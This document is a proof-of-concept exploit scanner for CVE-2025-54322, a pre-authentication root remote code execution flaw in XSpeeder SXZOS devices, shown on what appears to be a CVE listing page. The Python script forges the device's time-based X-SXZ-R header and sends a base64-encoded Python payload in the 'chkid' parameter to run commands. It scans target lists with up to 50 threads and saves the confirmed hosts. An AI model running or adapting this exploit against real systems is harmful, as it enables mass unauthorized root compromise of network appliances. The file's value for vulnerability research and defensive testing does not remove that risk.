4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / scanner.py PY
#!/usr/bin/env python3
import requests
import sys
import time
import re
import urllib3
from base64 import b64encode
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import HTTPAdapter
from urllib3.exceptions import InsecureRequestWarning as URLLib3InsecureWarning
from concurrent.futures import ThreadPoolExecutor, as_completed
from threading import Lock
#By Chirag Artani
# Disable all SSL warnings
# Requests in this file are sent with verify=False, which would otherwise
# emit an InsecureRequestWarning for every HTTPS request.
# NOTE(review): the same warning category is disabled through three import
# paths; these presumably resolve to the same class in current releases of
# requests/urllib3 -- confirm before trimming.
urllib3.disable_warnings(URLLib3InsecureWarning)
urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Thread-safe locks
# print_lock is held by safe_print() around print().
print_lock = Lock()
# file_lock is held by write_vulnerable() around appends to vuln-confirm.txt.
file_lock = Lock()

def safe_print(message):
    """Print ``message`` while holding ``print_lock``.

    Holding the module-level lock for the duration of the ``print`` call
    keeps output from concurrent worker threads from interleaving.
    """
    print_lock.acquire()
    try:
        print(message)
    finally:
        # Always release, even if print() raises (e.g. a closed stdout).
        print_lock.release()

def write_vulnerable(url, output, status):
    """Append one finding to ``vuln-confirm.txt`` while holding ``file_lock``.

    Args:
        url: Target URL the finding belongs to.
        output: Text captured from the response (may be arbitrary response
            content, or ``None``).
        status: Human-readable status string for the finding.

    The record layout is unchanged: the URL line, a ``Status:`` line, an
    ``Output:`` line and a 70-character dashed separator.
    """
    # Build the whole record first so the lock is held only for the write
    # and the record reaches the file in a single call.
    record = (
        f"{url}\n"
        f"Status: {status}\n"
        f"Output: {output}\n"
        + "-" * 70 + "\n"
    )
    with file_lock:
        # `output` can contain arbitrary characters taken from a response
        # body. With the platform default encoding (e.g. cp1252) such text
        # raises UnicodeEncodeError and the finding is lost, so write UTF-8
        # explicitly and replace anything that still cannot be encoded.
        with open('vuln-confirm.txt', 'a', encoding='utf-8', errors='replace') as f:
            f.write(record)

class SSLAdapter(HTTPAdapter):
    """Transport adapter that builds its pool manager with certificate checks off."""

    def init_poolmanager(self, *args, **kwargs):
        """Override the TLS-related pool options, then defer to ``HTTPAdapter``.

        Any values the caller supplied for ``ssl_version``, ``cert_reqs`` or
        ``assert_hostname`` are overwritten.
        """
        tls_overrides = {
            'ssl_version': urllib3.util.ssl_.PROTOCOL_TLS,
            'cert_reqs': 'CERT_NONE',
            'assert_hostname': False,
        }
        kwargs.update(tls_overrides)
        return super().init_poolmanager(*args, **kwargs)

class XspeederScanner:
    """Probe a single target URL and classify the response.

    One instance handles one target: it owns a ``requests`` session, sends a
    warm-up request followed by a probe request, and inspects the probe
    response text for the output of the ``id`` command.

    The probe causes a command to run on a vulnerable device, so this class
    must only be pointed at systems the operator is authorized to test.

    NOTE(review): the session created in ``__init__`` is never closed in the
    code visible here.
    """

    def __init__(self, target_url, max_retries=2, thread_id=None):
        """Store the target settings and prepare the session and match pattern.

        Args:
            target_url: Base URL of the target; trailing ``/`` characters are
                removed.
            max_retries: Number of attempts made by ``check_vulnerability``.
            thread_id: Caller-supplied identifier; stored but not read by any
                method of this class.
        """
        self.target_url = target_url.rstrip('/')
        self.max_retries = max_retries
        self.thread_id = thread_id
        self.session = self._create_session()
        # Regex to match uid/gid output from 'id' command
        self.id_regex = re.compile(r'uid=\d+\([a-zA-Z0-9_-]+\)\s+gid=\d+\([a-zA-Z0-9_-]+\)')

    def _create_session(self):
        """Create a requests session with SSL bypass

        Returns a ``requests.Session`` with ``SSLAdapter`` mounted for both
        URL schemes and ``Connection: close`` / ``Accept: */*`` set as
        default headers.
        """
        session = requests.Session()

        # Mount custom SSL adapter for both HTTP and HTTPS
        adapter = SSLAdapter()
        session.mount('http://', adapter)
        session.mount('https://', adapter)

        # Set default headers
        session.headers.update({
            'Connection': 'close',
            'Accept': '*/*'
        })

        return session

    def build_payload(self):
        """Build the exploit payload with 'id' command - MATCHING ORIGINAL

        Returns the payload text base64-encoded as a ``str``; the caller
        places it in the ``chkid`` query parameter.
        """
        cmd = 'id'
        # Use os.system() like original PoC, but capture output
        # NOTE(review): the trailing '#sUserCodexsPwd' text is part of the
        # string that gets encoded; its purpose is not evident from this file.
        payload = f'__import__("os").system("{cmd}") or __import__("subprocess").check_output("{cmd}", shell=True).decode() #sUserCodexsPwd'
        encoded_payload = b64encode(payload.encode()).decode("utf-8")
        return encoded_payload

    def calculate_nonce(self):
        """Calculate the time-based nonce for X-SXZ-R header

        The value is the current Unix time in whole minutes, modulo 7,
        returned as a string.
        """
        return str(int(time.time() / 60) % 7)

    def warm_session(self, headers):
        """Warm up the session - MATCHING ORIGINAL (no validation)

        Sends a GET to ``<target>/webInfos/`` and ignores the response.

        Returns:
            ``True`` if the request completed or timed out, ``False`` if any
            other exception was raised.
        """
        try:
            warmup_url = f"{self.target_url}/webInfos/"
            self.session.get(
                warmup_url,
                headers=headers,
                verify=False,
                timeout=20,
                allow_redirects=True
            )
            return True
        except requests.exceptions.Timeout:
            # A timeout is deliberately treated as success so that the
            # caller still proceeds to the probe request.
            return True
        except Exception:
            return False

    def send_exploit(self, headers, payload):
        """Send the actual exploit request

        Returns:
            The ``requests`` response object, or ``None`` if any exception
            was raised while sending (the exception itself is discarded).
        """
        try:
            exploit_url = f"{self.target_url}/?title=ABC&oIp=XXX&chkid={payload}"
            response = self.session.get(
                exploit_url,
                headers=headers,
                verify=False,
                timeout=20,
                allow_redirects=False
            )
            return response
        except Exception:
            return None

    def check_vulnerability(self):
        """Main function to check if target is vulnerable

        Makes up to ``self.max_retries`` attempts. Each attempt sends the
        warm-up request, waits 0.3 s, sends the probe and inspects the
        response text.

        Returns:
            A dict that always has the keys ``'vulnerable'`` (bool),
            ``'status'`` (str) and ``'output'`` (str or ``None``).
            ``'status_code'`` is present whenever a probe response was
            received, and ``'full_response'`` (first 500 characters) only for
            a full ``id`` pattern match.
        """
        for attempt in range(1, self.max_retries + 1):
            try:
                # Calculate fresh nonce for each attempt
                nonce = self.calculate_nonce()

                headers = {
                    'User-Agent': 'SXZ/2.3',
                    'X-SXZ-R': nonce,
                    'Accept': '*/*'
                }

                # Step 1: Warm up session
                if not self.warm_session(headers):
                    if attempt < self.max_retries:
                        time.sleep(1)
                        continue
                    return {
                        'vulnerable': False,
                        'status': 'Connection completely failed',
                        'output': None
                    }

                # Small delay between requests
                time.sleep(0.3)

                # Step 2: Send exploit
                payload = self.build_payload()
                response = self.send_exploit(headers, payload)

                if response is None:
                    if attempt < self.max_retries:
                        time.sleep(1)
                        continue
                    return {
                        'vulnerable': False,
                        'status': 'Exploit delivery failed',
                        'output': None
                    }

                # Check response for 'id' command output
                response_text = response.text

                # Look for uid/gid pattern in response
                id_match = self.id_regex.search(response_text)

                if id_match:
                    return {
                        'vulnerable': True,
                        'status': 'VULNERABLE - RCE Confirmed',
                        'output': id_match.group(0),
                        'status_code': response.status_code,
                        'full_response': response_text[:500]
                    }

                # Check for other indicators (partial match)
                # NOTE(review): a bare 'uid=' or 'gid=' substring can occur in
                # unrelated page content, so results from this branch are
                # unconfirmed even though 'vulnerable' is set to True.
                if 'uid=' in response_text or 'gid=' in response_text:
                    return {
                        'vulnerable': True,
                        'status': 'LIKELY VULNERABLE - Partial match',
                        'output': response_text[:200],
                        'status_code': response.status_code
                    }

                # Check for error indicators that suggest code execution
                # NOTE(review): these are plain substring tests; generic words
                # such as 'eval' or 'subprocess' may appear in ordinary
                # responses, so this branch can report false positives.
                execution_indicators = [
                    'CalledProcessError',
                    'subprocess',
                    'Traceback',
                    'NameError',
                    'SyntaxError',
                    'eval'
                ]

                if any(indicator in response_text for indicator in execution_indicators):
                    return {
                        'vulnerable': True,
                        'status': 'POTENTIALLY VULNERABLE - Code execution indicators found',
                        'output': response_text[:300],
                        'status_code': response.status_code
                    }

                # If no match and we have retries left, try again
                if attempt < self.max_retries:
                    time.sleep(1)
                    continue

                return {
                    'vulnerable': False,
                    'status': 'Not vulnerable',
                    'output': None,
                    'status_code': response.status_code
                }

            except Exception as e:
                if attempt < self.max_retries:
                    time.sleep(1)
                    continue
                return {
                    'vulnerable': False,
                    'status': f'Error: {str(e)[:100]}',
                    'output': None
                }

        # Every path through the final loop iteration returns, so this point
        # is reached only when the loop body never runs (max_retries < 1).
        return {
            'vulnerable': False,
            'status': 'Max retries exceeded',
            'output': None
        }

def load_targets(filename):
    """Load the target list from a text file, one target per line.

    Blank lines and comment lines are skipped. A comment line is one whose
    first non-whitespace character is ``#``; the check is made after
    stripping, so indented comments are skipped as well instead of being
    returned as targets.

    Args:
        filename: Path of the targets file.

    Returns:
        A list of stripped, non-empty, non-comment lines in file order.

    Raises:
        SystemExit: With exit code 1, after printing a message, if the file
            does not exist or cannot be read or decoded.
    """
    try:
        with open(filename, 'r') as f:
            # Strip before testing for '#': the raw line still carries any
            # leading whitespace, which would hide an indented comment.
            stripped_lines = (line.strip() for line in f)
            return [
                entry for entry in stripped_lines
                if entry and not entry.startswith('#')
            ]
    except FileNotFoundError:
        print(f"[-] Error: File '{filename}' not found")
        sys.exit(1)
    except (OSError, ValueError) as e:
        # OSError: permission problems, directories, other I/O failures.
        # ValueError: decoding errors (UnicodeDecodeError) and invalid paths.
        print(f"[-] Error reading file: {e}")
        sys.exit(1)

def scan_target(target, thread_id):
    """Worker entry point: check one target and pair it with its result.

    Builds an ``XspeederScanner`` for ``target`` (two attempts) and returns
    ``(target, result_dict)``.
    """
    return target, XspeederScanner(
        target,
        max_retries=2,
        thread_id=thread_id,
    ).check_vulnerability()

def print_vulnerable(target, result):
    """Emit a framed report for one positive result via ``safe_print``.

    The HTTP status line is included only when ``result`` carries a
    ``'status_code'`` key.
    """
    rule = '=' * 70
    lines = [
        f"\n{rule}",
        f"[+] VULNERABLE: {target}",
        f"[+] Status: {result['status']}",
    ]
    if 'status_code' in result:
        lines.append(f"[+] HTTP Status: {result['status_code']}")
    lines += [
        f"[+] Output: {result['output']}",
        f"{rule}\n",
    ]

    # One safe_print call keeps the whole report contiguous on the console.
    safe_print('\n'.join(lines))

def main():
    """Command-line entry point: parse arguments, scan all targets, report.

    Usage: ``scanner.py <targets_file> [threads]`` (threads: 1-50, default 10).

    Positive results are printed as they arrive and appended to
    ``vuln-confirm.txt``, which is truncated at the start of each run. A
    summary is printed and appended to that file when the scan ends.

    Raises:
        SystemExit: With exit code 1 on bad usage, an invalid thread count,
            or an unreadable targets file.
    """
    banner = """
╔═══════════════════════════════════════════════════════════════╗
║     XSpeeder SXZOS (CVE-2025-54322) RCE Scanner              ║
║     Pre-Auth Root RCE Vulnerability Checker                   ║
║     Showing: VULNERABLE HOSTS ONLY                            ║
╚═══════════════════════════════════════════════════════════════╝
    """
    print(banner)

    if len(sys.argv) < 2 or len(sys.argv) > 3:
        print("[-] Usage: python3 scanner.py <targets_file> [threads]")
        print("[-] Example: python3 scanner.py targets.txt 20")
        print("[-] Default threads: 10")
        sys.exit(1)

    targets_file = sys.argv[1]

    max_threads = 10
    if len(sys.argv) == 3:
        try:
            max_threads = int(sys.argv[2])
        except ValueError:
            # A non-numeric argument gets the same message as an out-of-range
            # one instead of surfacing as a generic fatal error.
            print("[-] Thread count must be between 1 and 50")
            sys.exit(1)

    # Validate thread count
    if max_threads < 1 or max_threads > 50:
        print("[-] Thread count must be between 1 and 50")
        sys.exit(1)

    targets = load_targets(targets_file)

    # Clear the output file
    with open('vuln-confirm.txt', 'w') as f:
        f.write(f"XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts\n")
        f.write(f"Scan started: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
        f.write("="*70 + "\n\n")

    print(f"[*] Loaded {len(targets)} targets from {targets_file}")
    print(f"[*] Using {max_threads} concurrent threads")
    print(f"[*] Vulnerable hosts will be saved to: vuln-confirm.txt")
    print(f"[*] Starting scan...\n")

    vulnerable_count = 0
    processed = 0
    start_time = time.time()

    # Threading with ThreadPoolExecutor
    with ThreadPoolExecutor(max_workers=max_threads) as executor:
        # Submit all tasks
        future_to_target = {
            executor.submit(scan_target, target, i): target
            for i, target in enumerate(targets, 1)
        }

        try:
            # Process completed tasks
            for future in as_completed(future_to_target):
                target = future_to_target[future]
                processed += 1

                try:
                    target_url, result = future.result()

                    # Only print and save if vulnerable
                    if result['vulnerable']:
                        vulnerable_count += 1
                        print_vulnerable(target_url, result)
                        write_vulnerable(target_url, result['output'], result['status'])

                    # Print progress every 50 hosts
                    if processed % 50 == 0:
                        safe_print(f"[*] Progress: {processed}/{len(targets)} | Found: {vulnerable_count} vulnerable")

                except Exception as e:
                    safe_print(f"[!] Error processing {target}: {e}")

        except KeyboardInterrupt:
            safe_print("\n\n[!] Scan interrupted by user. Waiting for active threads to finish...")
            # Drop work that has not started yet; without this, shutdown()
            # would still run every queued target before returning.
            # cancel() is a no-op for futures already running or finished.
            for pending in future_to_target:
                pending.cancel()
            executor.shutdown(wait=True)

    elapsed_time = time.time() - start_time

    # `processed` equals len(targets) after a full run and is smaller after
    # an interrupt, so the summary reflects the work that actually completed.
    scanned = processed
    # Guard the ratios: an empty targets file or an immediate interrupt
    # leaves nothing scanned and would otherwise divide by zero.
    success_rate = (vulnerable_count / scanned * 100) if scanned else 0.0
    average_time = (elapsed_time / scanned) if scanned else 0.0

    # Final Summary
    print(f"\n{'='*70}")
    print(f"[*] SCAN COMPLETE")
    print(f"{'='*70}")
    print(f"[*] Total Time: {elapsed_time:.2f} seconds")
    print(f"[*] Total Targets Scanned: {scanned}")
    print(f"[*] Vulnerable Hosts Found: {vulnerable_count}")
    print(f"[*] Success Rate: {success_rate:.2f}%")
    print(f"[*] Average Time per Target: {average_time:.2f} seconds")
    print(f"{'='*70}\n")

    if vulnerable_count > 0:
        print(f"[+] All vulnerable hosts saved to: vuln-confirm.txt")
        print(f"[+] Total vulnerable: {vulnerable_count}/{scanned}")
    else:
        print(f"[-] No vulnerable hosts found")

    # Append summary to file
    with open('vuln-confirm.txt', 'a') as f:
        f.write("\n" + "="*70 + "\n")
        f.write(f"Scan completed: {time.strftime('%Y-%m-%d %H:%M:%S')}\n")
        f.write(f"Total scanned: {scanned}\n")
        f.write(f"Vulnerable: {vulnerable_count}\n")
        f.write(f"Time taken: {elapsed_time:.2f} seconds\n")

if __name__ == "__main__":
    # Script entry point: run main() and map the two failure modes to exit
    # codes -- 0 for a user interrupt, 1 for any other unhandled exception.
    try:
        main()
    except KeyboardInterrupt:
        print("\n\n[!] Script terminated by user")
        raise SystemExit(0)
    except Exception as exc:
        print(f"\n[!] Fatal error: {exc}")
        raise SystemExit(1)